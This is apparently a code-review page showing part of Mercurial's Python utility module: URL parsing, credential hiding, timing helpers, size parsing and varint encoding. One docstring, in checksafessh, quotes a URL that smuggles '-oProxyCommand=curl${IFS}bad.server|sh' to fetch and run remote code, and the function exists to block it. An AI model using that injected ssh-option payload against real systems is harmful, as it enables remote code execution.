2954 2960 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2955 2961
2956 2962 Missing components are set to None. The only exception is
2957 2963 fragment, which is set to '' if present but empty.
2958 2964
2959 2965 If parsefragment is False, fragment is included in query. If
2960 2966 parsequery is False, query is included in path. If both are
2961 2967 False, both fragment and query are included in path.
2962 2968
2963 2969 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2964 2970
2965 2971 Note that for backward compatibility reasons, bundle URLs do not
2966 2972 take host names. That means 'bundle://../' has a path of '../'.
2967 2973
2968 2974 Examples:
2969 2975
2970 2976 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2971 2977 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2972 2978 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2973 2979 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2974 2980 >>> url(b'file:///home/joe/repo')
2975 2981 <url scheme: 'file', path: '/home/joe/repo'>
2976 2982 >>> url(b'file:///c:/temp/foo/')
2977 2983 <url scheme: 'file', path: 'c:/temp/foo/'>
2978 2984 >>> url(b'bundle:foo')
2979 2985 <url scheme: 'bundle', path: 'foo'>
2980 2986 >>> url(b'bundle://../foo')
2981 2987 <url scheme: 'bundle', path: '../foo'>
2982 2988 >>> url(br'c:\foo\bar')
2983 2989 <url path: 'c:\\foo\\bar'>
2984 2990 >>> url(br'\\blah\blah\blah')
2985 2991 <url path: '\\\\blah\\blah\\blah'>
2986 2992 >>> url(br'\\blah\blah\blah#baz')
2987 2993 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2988 2994 >>> url(br'file:///C:\users\me')
2989 2995 <url scheme: 'file', path: 'C:\\users\\me'>
2990 2996
2991 2997 Authentication credentials:
2992 2998
2993 2999 >>> url(b'ssh://joe:xyz@x/repo')
2994 3000 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2995 3001 >>> url(b'ssh://joe@x/repo')
2996 3002 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2997 3003
2998 3004 Query strings and fragments:
2999 3005
3000 3006 >>> url(b'http://host/a?b#c')
3001 3007 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
3002 3008 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
3003 3009 <url scheme: 'http', host: 'host', path: 'a?b#c'>
3004 3010
3005 3011 Empty path:
3006 3012
3007 3013 >>> url(b'')
3008 3014 <url path: ''>
3009 3015 >>> url(b'#a')
3010 3016 <url path: '', fragment: 'a'>
3011 3017 >>> url(b'http://host/')
3012 3018 <url scheme: 'http', host: 'host', path: ''>
3013 3019 >>> url(b'http://host/#a')
3014 3020 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3015 3021
3016 3022 Only scheme:
3017 3023
3018 3024 >>> url(b'http:')
3019 3025 <url scheme: 'http'>
3020 3026 """
3021 3027
3022 3028 _safechars = b"!~*'()+"
3023 3029 _safepchars = b"/!~*'()+:\\"
3024 3030 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3025 3031
3026 3032 def __init__(self, path, parsequery=True, parsefragment=True):
3027 3033 # We slowly chomp away at path until we have only the path left
3028 3034 self.scheme = self.user = self.passwd = self.host = None
3029 3035 self.port = self.path = self.query = self.fragment = None
3030 3036 self._localpath = True
3031 3037 self._hostport = b''
3032 3038 self._origpath = path
3033 3039
3034 3040 if parsefragment and b'#' in path:
3035 3041 path, self.fragment = path.split(b'#', 1)
3036 3042
3037 3043 # special case for Windows drive letters and UNC paths
3038 3044 if hasdriveletter(path) or path.startswith(b'\\\\'):
3039 3045 self.path = path
3040 3046 return
3041 3047
3042 3048 # For compatibility reasons, we can't handle bundle paths as
3043 3049 # normal URLS
3044 3050 if path.startswith(b'bundle:'):
3045 3051 self.scheme = b'bundle'
3046 3052 path = path[7:]
3047 3053 if path.startswith(b'//'):
3048 3054 path = path[2:]
3049 3055 self.path = path
3050 3056 return
3051 3057
3052 3058 if self._matchscheme(path):
3053 3059 parts = path.split(b':', 1)
3054 3060 if parts[0]:
3055 3061 self.scheme, path = parts
3056 3062 self._localpath = False
3057 3063
3058 3064 if not path:
3059 3065 path = None
3060 3066 if self._localpath:
3061 3067 self.path = b''
3062 3068 return
3063 3069 else:
3064 3070 if self._localpath:
3065 3071 self.path = path
3066 3072 return
3067 3073
3068 3074 if parsequery and b'?' in path:
3069 3075 path, self.query = path.split(b'?', 1)
3070 3076 if not path:
3071 3077 path = None
3072 3078 if not self.query:
3073 3079 self.query = None
3074 3080
3075 3081 # // is required to specify a host/authority
3076 3082 if path and path.startswith(b'//'):
3077 3083 parts = path[2:].split(b'/', 1)
3078 3084 if len(parts) > 1:
3079 3085 self.host, path = parts
3080 3086 else:
3081 3087 self.host = parts[0]
3082 3088 path = None
3083 3089 if not self.host:
3084 3090 self.host = None
3085 3091 # path of file:///d is /d
3086 3092 # path of file:///d:/ is d:/, not /d:/
3087 3093 if path and not hasdriveletter(path):
3088 3094 path = b'/' + path
3089 3095
3090 3096 if self.host and b'@' in self.host:
3091 3097 self.user, self.host = self.host.rsplit(b'@', 1)
3092 3098 if b':' in self.user:
3093 3099 self.user, self.passwd = self.user.split(b':', 1)
3094 3100 if not self.host:
3095 3101 self.host = None
3096 3102
3097 3103 # Don't split on colons in IPv6 addresses without ports
3098 3104 if (
3099 3105 self.host
3100 3106 and b':' in self.host
3101 3107 and not (
3102 3108 self.host.startswith(b'[') and self.host.endswith(b']')
3103 3109 )
3104 3110 ):
3105 3111 self._hostport = self.host
3106 3112 self.host, self.port = self.host.rsplit(b':', 1)
3107 3113 if not self.host:
3108 3114 self.host = None
3109 3115
3110 3116 if (
3111 3117 self.host
3112 3118 and self.scheme == b'file'
3113 3119 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3114 3120 ):
3115 3121 raise error.Abort(
3116 3122 _(b'file:// URLs can only refer to localhost')
3117 3123 )
3118 3124
3119 3125 self.path = path
3120 3126
3121 3127 # leave the query string escaped
3122 3128 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3123 3129 v = getattr(self, a)
3124 3130 if v is not None:
3125 3131 setattr(self, a, urlreq.unquote(v))
3126 3132
3127 3133 @encoding.strmethod
3128 3134 def __repr__(self):
3129 3135 attrs = []
3130 3136 for a in (
3131 3137 b'scheme',
3132 3138 b'user',
3133 3139 b'passwd',
3134 3140 b'host',
3135 3141 b'port',
3136 3142 b'path',
3137 3143 b'query',
3138 3144 b'fragment',
3139 3145 ):
3140 3146 v = getattr(self, a)
3141 3147 if v is not None:
3142 3148 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3143 3149 return b'<url %s>' % b', '.join(attrs)
3144 3150
3145 3151 def __bytes__(self):
3146 3152 r"""Join the URL's components back into a URL string.
3147 3153
3148 3154 Examples:
3149 3155
3150 3156 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3151 3157 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3152 3158 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3153 3159 'http://user:pw@host:80/?foo=bar&baz=42'
3154 3160 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3155 3161 'http://user:pw@host:80/?foo=bar%3dbaz'
3156 3162 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3157 3163 'ssh://user:pw@[::1]:2200//home/joe#'
3158 3164 >>> bytes(url(b'http://localhost:80//'))
3159 3165 'http://localhost:80//'
3160 3166 >>> bytes(url(b'http://localhost:80/'))
3161 3167 'http://localhost:80/'
3162 3168 >>> bytes(url(b'http://localhost:80'))
3163 3169 'http://localhost:80/'
3164 3170 >>> bytes(url(b'bundle:foo'))
3165 3171 'bundle:foo'
3166 3172 >>> bytes(url(b'bundle://../foo'))
3167 3173 'bundle:../foo'
3168 3174 >>> bytes(url(b'path'))
3169 3175 'path'
3170 3176 >>> bytes(url(b'file:///tmp/foo/bar'))
3171 3177 'file:///tmp/foo/bar'
3172 3178 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3173 3179 'file:///c:/tmp/foo/bar'
3174 3180 >>> print(url(br'bundle:foo\bar'))
3175 3181 bundle:foo\bar
3176 3182 >>> print(url(br'file:///D:\data\hg'))
3177 3183 file:///D:\data\hg
3178 3184 """
3179 3185 if self._localpath:
3180 3186 s = self.path
3181 3187 if self.scheme == b'bundle':
3182 3188 s = b'bundle:' + s
3183 3189 if self.fragment:
3184 3190 s += b'#' + self.fragment
3185 3191 return s
3186 3192
3187 3193 s = self.scheme + b':'
3188 3194 if self.user or self.passwd or self.host:
3189 3195 s += b'//'
3190 3196 elif self.scheme and (
3191 3197 not self.path
3192 3198 or self.path.startswith(b'/')
3193 3199 or hasdriveletter(self.path)
3194 3200 ):
3195 3201 s += b'//'
3196 3202 if hasdriveletter(self.path):
3197 3203 s += b'/'
3198 3204 if self.user:
3199 3205 s += urlreq.quote(self.user, safe=self._safechars)
3200 3206 if self.passwd:
3201 3207 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3202 3208 if self.user or self.passwd:
3203 3209 s += b'@'
3204 3210 if self.host:
3205 3211 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3206 3212 s += urlreq.quote(self.host)
3207 3213 else:
3208 3214 s += self.host
3209 3215 if self.port:
3210 3216 s += b':' + urlreq.quote(self.port)
3211 3217 if self.host:
3212 3218 s += b'/'
3213 3219 if self.path:
3214 3220 # TODO: similar to the query string, we should not unescape the
3215 3221 # path when we store it, the path might contain '%2f' = '/',
3216 3222 # which we should *not* escape.
3217 3223 s += urlreq.quote(self.path, safe=self._safepchars)
3218 3224 if self.query:
3219 3225 # we store the query in escaped form.
3220 3226 s += b'?' + self.query
3221 3227 if self.fragment is not None:
3222 3228 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3223 3229 return s
3224 3230
3225 3231 __str__ = encoding.strmethod(__bytes__)
3226 3232
3227 3233 def authinfo(self):
3228 3234 user, passwd = self.user, self.passwd
3229 3235 try:
3230 3236 self.user, self.passwd = None, None
3231 3237 s = bytes(self)
3232 3238 finally:
3233 3239 self.user, self.passwd = user, passwd
3234 3240 if not self.user:
3235 3241 return (s, None)
3236 3242 # authinfo[1] is passed to urllib2 password manager, and its
3237 3243 # URIs must not contain credentials. The host is passed in the
3238 3244 # URIs list because Python < 2.4.3 uses only that to search for
3239 3245 # a password.
3240 3246 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3241 3247
3242 3248 def isabs(self):
3243 3249 if self.scheme and self.scheme != b'file':
3244 3250 return True # remote URL
3245 3251 if hasdriveletter(self.path):
3246 3252 return True # absolute for our purposes - can't be joined()
3247 3253 if self.path.startswith(br'\\'):
3248 3254 return True # Windows UNC path
3249 3255 if self.path.startswith(b'/'):
3250 3256 return True # POSIX-style
3251 3257 return False
3252 3258
3253 3259 def localpath(self):
3254 3260 if self.scheme == b'file' or self.scheme == b'bundle':
3255 3261 path = self.path or b'/'
3256 3262 # For Windows, we need to promote hosts containing drive
3257 3263 # letters to paths with drive letters.
3258 3264 if hasdriveletter(self._hostport):
3259 3265 path = self._hostport + b'/' + self.path
3260 3266 elif (
3261 3267 self.host is not None and self.path and not hasdriveletter(path)
3262 3268 ):
3263 3269 path = b'/' + path
3264 3270 return path
3265 3271 return self._origpath
3266 3272
3267 3273 def islocal(self):
3268 3274 '''whether localpath will return something that posixfile can open'''
3269 3275 return (
3270 3276 not self.scheme
3271 3277 or self.scheme == b'file'
3272 3278 or self.scheme == b'bundle'
3273 3279 )
3274 3280
3275 3281
3276 3282 def hasscheme(path):
3277 3283 return bool(url(path).scheme)
3278 3284
3279 3285
3280 3286 def hasdriveletter(path):
3281 3287 return path and path[1:2] == b':' and path[0:1].isalpha()
3282 3288
3283 3289
3284 3290 def urllocalpath(path):
3285 3291 return url(path, parsequery=False, parsefragment=False).localpath()
3286 3292
3287 3293
3288 3294 def checksafessh(path):
3289 3295 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3290 3296
3291 3297 This is a sanity check for ssh urls. ssh will parse the first item as
3292 3298 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3293 3299 Let's prevent these potentially exploited urls entirely and warn the
3294 3300 user.
3295 3301
3296 3302 Raises an error.Abort when the url is unsafe.
3297 3303 """
3298 3304 path = urlreq.unquote(path)
3299 3305 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3300 3306 raise error.Abort(
3301 3307 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3302 3308 )
3303 3309
3304 3310
3305 3311 def hidepassword(u):
3306 3312 '''hide user credential in a url string'''
3307 3313 u = url(u)
3308 3314 if u.passwd:
3309 3315 u.passwd = b'***'
3310 3316 return bytes(u)
3311 3317
3312 3318
3313 3319 def removeauth(u):
3314 3320 '''remove all authentication information from a url string'''
3315 3321 u = url(u)
3316 3322 u.user = u.passwd = None
3317 3323 return bytes(u)
3318 3324
3319 3325
3320 3326 timecount = unitcountfn(
3321 3327 (1, 1e3, _(b'%.0f s')),
3322 3328 (100, 1, _(b'%.1f s')),
3323 3329 (10, 1, _(b'%.2f s')),
3324 3330 (1, 1, _(b'%.3f s')),
3325 3331 (100, 0.001, _(b'%.1f ms')),
3326 3332 (10, 0.001, _(b'%.2f ms')),
3327 3333 (1, 0.001, _(b'%.3f ms')),
3328 3334 (100, 0.000001, _(b'%.1f us')),
3329 3335 (10, 0.000001, _(b'%.2f us')),
3330 3336 (1, 0.000001, _(b'%.3f us')),
3331 3337 (100, 0.000000001, _(b'%.1f ns')),
3332 3338 (10, 0.000000001, _(b'%.2f ns')),
3333 3339 (1, 0.000000001, _(b'%.3f ns')),
3334 3340 )
3335 3341
3336 3342
3337 3343 @attr.s
3338 3344 class timedcmstats(object):
3339 3345 """Stats information produced by the timedcm context manager on entering."""
3340 3346
3341 3347 # the starting value of the timer as a float (meaning and resulution is
3342 3348 # platform dependent, see util.timer)
3343 3349 start = attr.ib(default=attr.Factory(lambda: timer()))
3344 3350 # the number of seconds as a floating point value; starts at 0, updated when
3345 3351 # the context is exited.
3346 3352 elapsed = attr.ib(default=0)
3347 3353 # the number of nested timedcm context managers.
3348 3354 level = attr.ib(default=1)
3349 3355
3350 3356 def __bytes__(self):
3351 3357 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3352 3358
3353 3359 __str__ = encoding.strmethod(__bytes__)
3354 3360
3355 3361
3356 3362 @contextlib.contextmanager
3357 3363 def timedcm(whencefmt, *whenceargs):
3358 3364 """A context manager that produces timing information for a given context.
3359 3365
3360 3366 On entering a timedcmstats instance is produced.
3361 3367
3362 3368 This context manager is reentrant.
3363 3369
3364 3370 """
3365 3371 # track nested context managers
3366 3372 timedcm._nested += 1
3367 3373 timing_stats = timedcmstats(level=timedcm._nested)
3368 3374 try:
3369 3375 with tracing.log(whencefmt, *whenceargs):
3370 3376 yield timing_stats
3371 3377 finally:
3372 3378 timing_stats.elapsed = timer() - timing_stats.start
3373 3379 timedcm._nested -= 1
3374 3380
3375 3381
3376 3382 timedcm._nested = 0
3377 3383
3378 3384
3379 3385 def timed(func):
3380 3386 '''Report the execution time of a function call to stderr.
3381 3387
3382 3388 During development, use as a decorator when you need to measure
3383 3389 the cost of a function, e.g. as follows:
3384 3390
3385 3391 @util.timed
3386 3392 def foo(a, b, c):
3387 3393 pass
3388 3394 '''
3389 3395
3390 3396 def wrapper(*args, **kwargs):
3391 3397 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3392 3398 result = func(*args, **kwargs)
3393 3399 stderr = procutil.stderr
3394 3400 stderr.write(
3395 3401 b'%s%s: %s\n'
3396 3402 % (
3397 3403 b' ' * time_stats.level * 2,
3398 3404 pycompat.bytestr(func.__name__),
3399 3405 time_stats,
3400 3406 )
3401 3407 )
3402 3408 return result
3403 3409
3404 3410 return wrapper
3405 3411
3406 3412
3407 3413 _sizeunits = (
3408 3414 (b'm', 2 ** 20),
3409 3415 (b'k', 2 ** 10),
3410 3416 (b'g', 2 ** 30),
3411 3417 (b'kb', 2 ** 10),
3412 3418 (b'mb', 2 ** 20),
3413 3419 (b'gb', 2 ** 30),
3414 3420 (b'b', 1),
3415 3421 )
3416 3422
3417 3423
3418 3424 def sizetoint(s):
3419 3425 '''Convert a space specifier to a byte count.
3420 3426
3421 3427 >>> sizetoint(b'30')
3422 3428 30
3423 3429 >>> sizetoint(b'2.2kb')
3424 3430 2252
3425 3431 >>> sizetoint(b'6M')
3426 3432 6291456
3427 3433 '''
3428 3434 t = s.strip().lower()
3429 3435 try:
3430 3436 for k, u in _sizeunits:
3431 3437 if t.endswith(k):
3432 3438 return int(float(t[: -len(k)]) * u)
3433 3439 return int(t)
3434 3440 except ValueError:
3435 3441 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3436 3442
3437 3443
3438 3444 class hooks(object):
3439 3445 '''A collection of hook functions that can be used to extend a
3440 3446 function's behavior. Hooks are called in lexicographic order,
3441 3447 based on the names of their sources.'''
3442 3448
3443 3449 def __init__(self):
3444 3450 self._hooks = []
3445 3451
3446 3452 def add(self, source, hook):
3447 3453 self._hooks.append((source, hook))
3448 3454
3449 3455 def __call__(self, *args):
3450 3456 self._hooks.sort(key=lambda x: x[0])
3451 3457 results = []
3452 3458 for source, hook in self._hooks:
3453 3459 results.append(hook(*args))
3454 3460 return results
3455 3461
3456 3462
3457 3463 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3458 3464 '''Yields lines for a nicely formatted stacktrace.
3459 3465 Skips the 'skip' last entries, then return the last 'depth' entries.
3460 3466 Each file+linenumber is formatted according to fileline.
3461 3467 Each line is formatted according to line.
3462 3468 If line is None, it yields:
3463 3469 length of longest filepath+line number,
3464 3470 filepath+linenumber,
3465 3471 function
3466 3472
3467 3473 Not be used in production code but very convenient while developing.
3468 3474 '''
3469 3475 entries = [
3470 3476 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3471 3477 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3472 3478 ][-depth:]
3473 3479 if entries:
3474 3480 fnmax = max(len(entry[0]) for entry in entries)
3475 3481 for fnln, func in entries:
3476 3482 if line is None:
3477 3483 yield (fnmax, fnln, func)
3478 3484 else:
3479 3485 yield line % (fnmax, fnln, func)
3480 3486
3481 3487
3482 3488 def debugstacktrace(
3483 3489 msg=b'stacktrace',
3484 3490 skip=0,
3485 3491 f=procutil.stderr,
3486 3492 otherf=procutil.stdout,
3487 3493 depth=0,
3488 3494 prefix=b'',
3489 3495 ):
3490 3496 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3491 3497 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3492 3498 By default it will flush stdout first.
3493 3499 It can be used everywhere and intentionally does not require an ui object.
3494 3500 Not be used in production code but very convenient while developing.
3495 3501 '''
3496 3502 if otherf:
3497 3503 otherf.flush()
3498 3504 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3499 3505 for line in getstackframes(skip + 1, depth=depth):
3500 3506 f.write(prefix + line)
3501 3507 f.flush()
3502 3508
3503 3509
3504 3510 # convenient shortcut
3505 3511 dst = debugstacktrace
3506 3512
3507 3513
3508 3514 def safename(f, tag, ctx, others=None):
3509 3515 """
3510 3516 Generate a name that it is safe to rename f to in the given context.
3511 3517
3512 3518 f: filename to rename
3513 3519 tag: a string tag that will be included in the new name
3514 3520 ctx: a context, in which the new name must not exist
3515 3521 others: a set of other filenames that the new name must not be in
3516 3522
3517 3523 Returns a file name of the form oldname~tag[~number] which does not exist
3518 3524 in the provided context and is not in the set of other names.
3519 3525 """
3520 3526 if others is None:
3521 3527 others = set()
3522 3528
3523 3529 fn = b'%s~%s' % (f, tag)
3524 3530 if fn not in ctx and fn not in others:
3525 3531 return fn
3526 3532 for n in itertools.count(1):
3527 3533 fn = b'%s~%s~%s' % (f, tag, n)
3528 3534 if fn not in ctx and fn not in others:
3529 3535 return fn
3530 3536
3531 3537
3532 3538 def readexactly(stream, n):
3533 3539 '''read n bytes from stream.read and abort if less was available'''
3534 3540 s = stream.read(n)
3535 3541 if len(s) < n:
3536 3542 raise error.Abort(
3537 3543 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3538 3544 % (len(s), n)
3539 3545 )
3540 3546 return s
3541 3547
3542 3548
3543 3549 def uvarintencode(value):
3544 3550 """Encode an unsigned integer value to a varint.
3545 3551
3546 3552 A varint is a variable length integer of 1 or more bytes. Each byte
3547 3553 except the last has the most significant bit set. The lower 7 bits of
3548 3554 each byte store the 2's complement representation, least significant group
3549 3555 first.
3550 3556
3551 3557 >>> uvarintencode(0)
3552 3558 '\\x00'
3553 3559 >>> uvarintencode(1)
3554 3560 '\\x01'
3555 3561 >>> uvarintencode(127)
3556 3562 '\\x7f'
3557 3563 >>> uvarintencode(1337)
3558 3564 '\\xb9\\n'
3559 3565 >>> uvarintencode(65536)
3560 3566 '\\x80\\x80\\x04'
3561 3567 >>> uvarintencode(-1)
3562 3568 Traceback (most recent call last):
3563 3569 ...
3564 3570 ProgrammingError: negative value for uvarint: -1
3565 3571 """
3566 3572 if value < 0:
3567 3573 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3568 3574 bits = value & 0x7F
3569 3575 value >>= 7
3570 3576 bytes = []
3571 3577 while value:
3572 3578 bytes.append(pycompat.bytechr(0x80 | bits))
3573 3579 bits = value & 0x7F
3574 3580 value >>= 7
3575 3581 bytes.append(pycompat.bytechr(bits))
3576 3582
3577 3583 return b''.join(bytes)
3578 3584
3579 3585
3580 3586 def uvarintdecodestream(fh):
3581 3587 """Decode an unsigned variable length integer from a stream.
3582 3588
3583 3589 The passed argument is anything that has a ``.read(N)`` method.
3584 3590
3585 3591 >>> try:
3586 3592 ... from StringIO import StringIO as BytesIO
3587 3593 ... except ImportError:
3588 3594 ... from io import BytesIO
3589 3595 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3590 3596 0
3591 3597 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3592 3598 1
3593 3599 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3594 3600 127
3595 3601 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3596 3602 1337
3597 3603 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3598 3604 65536
3599 3605 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3600 3606 Traceback (most recent call last):
3601 3607 ...
3602 3608 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3603 3609 """
3604 3610 result = 0
3605 3611 shift = 0
3606 3612 while True:
3607 3613 byte = ord(readexactly(fh, 1))
3608 3614 result |= (byte & 0x7F) << shift
3609 3615 if not (byte & 0x80):
3610 3616 return result
3611 3617 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now